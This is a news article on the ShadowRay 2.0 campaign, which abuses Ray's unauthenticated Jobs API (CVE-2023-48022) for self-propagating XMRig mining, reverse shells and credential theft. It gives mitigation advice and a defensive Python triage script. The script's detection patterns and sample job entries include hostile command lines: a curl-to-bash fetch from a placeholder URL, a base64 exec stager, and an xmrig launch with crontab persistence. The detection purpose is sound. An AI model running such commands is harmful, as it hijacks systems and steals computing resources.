ShadowRay 2.0 Hijacks Ray AI Clusters for XMRig Cryptomining.

A global campaign named ShadowRay 2.0 is exploiting an unpatched, critical code execution flaw in publicly exposed Ray clusters to convert them into a self-propagating cryptomining botnet. Ray is an open-source framework developed by Anyscale for building and scaling AI and Python applications.

Exploiting an Unfixed Vulnerability

The threat actor, tracked as IronErn440, is compromising vulnerable Ray infrastructure that is directly reachable from the public internet. The campaign continues the earlier ShadowRay attacks; both exploit the same old, unpatched vulnerability, CVE-2023-48022.

The Ray framework was designed to operate within a trusted, strictly controlled network environment, so the flaw never received a patch. Researchers have nonetheless noted a huge spike in exposure, with over 230,000 Ray servers now publicly reachable on the internet.

Oligo researchers observed two recent attack waves, one using GitLab for payload delivery and a current one active since November 17, which abuses GitHub.

AI-Generated Payloads and Multifunctionality

The attackers are leveraging Ray's unauthenticated Jobs API, via CVE-2023-48022, to run complex, multi-stage Bash and Python payloads. These payloads are assessed to be AI-generated, based on analysis of their structure, comments, and error-handling patterns, which include "docstrings and useless echoes."

The malware then uses Ray's orchestration capabilities to autonomously spread the infection across all nodes in the cluster. While the primary goal is cryptocurrency mining, the activity also includes data and credential theft, and the deployment of Distributed Denial of Service (DDoS) attacks.

The cryptomining module, which is also AI-generated, uses XMRig to mine Monero. It intentionally limits CPU usage to 60% to evade immediate detection, and achieves persistence via cron jobs and systemd modifications. The attacker also ensures exclusivity by terminating rival mining scripts and blocking other mining pools through /etc/hosts and iptables. Beyond mining, the malware opens multiple Python reverse shells for interactive control, giving access to, and potential exfiltration of, sensitive data including proprietary AI models, source code, and MySQL credentials.

Mitigation

Since there is no direct patch for CVE-2023-48022, Ray users must follow the vendor-recommended deployment practices. These measures include:

  • Deploying Ray exclusively in a secure, trusted environment.
  • Protecting clusters from unauthorized access using strict firewall rules and security group policies.
  • Adding authorization on top of the Ray Dashboard port (default 8265).
  • Implementing continuous monitoring on AI clusters to identify anomalous activity.
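As an added example for the last bullet (not code from the article, Oligo, or the Ray project), a small Python triage script that reads a Ray Jobs API listing and flags job entrypoints carrying the indicators the article describes: payloads fetched from GitHub/GitLab and piped to a shell, encoded stagers, XMRig/Monero artifacts, cron/systemd persistence, and /etc/hosts or iptables tampering. The `GET /api/jobs/` response shape and all sample records are assumptions constructed here.

```python
from __future__ import annotations
import json
import re

# Indicator patterns derived from the behaviour the article reports.
INDICATORS = {
    "remote_fetch_to_shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"),
    "code_hosting_raw_url": re.compile(r"https?://(raw\.githubusercontent\.com|gitlab\.com)/", re.I),
    "encoded_stager": re.compile(r"base64\s*(-d|--decode)|b64decode\(", re.I),
    "miner_artifact": re.compile(r"\bxmrig\b|stratum\+tcp://|\bmonero\b", re.I),
    "persistence": re.compile(r"\bcrontab\b|/etc/cron|systemctl\s+(enable|daemon-reload)|/etc/systemd/"),
    "pool_blocking": re.compile(r"/etc/hosts|\biptables\b"),
}

# Constructed sample of a Ray Jobs API listing (assumption: a JSON list of job
# records, each with "job_id", "entrypoint" and "status"). URLs/pools are placeholders.
SAMPLE_JOBS_JSON = json.dumps([
    {"job_id": "raysubmit_aaa", "entrypoint": "python train.py --epochs 10", "status": "SUCCEEDED"},
    {"job_id": "raysubmit_bbb", "status": "RUNNING",
     "entrypoint": "bash -c 'curl -s https://raw.githubusercontent.com/EXAMPLE/x/main/s.sh | bash'"},
    {"job_id": "raysubmit_ccc", "status": "RUNNING",
     "entrypoint": "python -c \"import base64;exec(base64.b64decode('QUJD'))\""},
    {"job_id": "raysubmit_ddd", "status": "RUNNING",
     "entrypoint": "nohup ./xmrig -o stratum+tcp://POOL_PLACEHOLDER:3333 & "
                   "(crontab -l; echo '@reboot /tmp/.x/run.sh') | crontab -"},
])


def classify_entrypoint(entrypoint: str) -> list[str]:
    """Return the names of every indicator that matches a job entrypoint."""
    return [name for name, rx in INDICATORS.items() if rx.search(entrypoint)]


def triage_jobs(jobs_json: str) -> dict[str, list[str]]:
    """Map job_id -> matched indicators for every job that hit at least one indicator."""
    hits: dict[str, list[str]] = {}
    for job in json.loads(jobs_json):
        matched = classify_entrypoint(job.get("entrypoint", ""))
        if matched:
            hits[job["job_id"]] = matched
    return hits


if __name__ == "__main__":
    # In practice, feed this the body of GET http://<dashboard>:8265/api/jobs/ from your own cluster.
    for job_id, matched in triage_jobs(SAMPLE_JOBS_JSON).items():
        print(f"{job_id}: {', '.join(matched)}")
```

Any hit is worth an immediate look at the node's cron, systemd units, /etc/hosts and iptables state, since the article describes those as the persistence and exclusivity footprint of the campaign.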

Cybersecurity Insight delivers timely updates on global cybersecurity developments, including recent system breaches, cyber-attacks, advancements in artificial intelligence (AI), and emerging technology innovations. Our goal is to keep viewers well informed about the latest trends in technology and system security, and how these changes affect our lives and the broader ecosystem.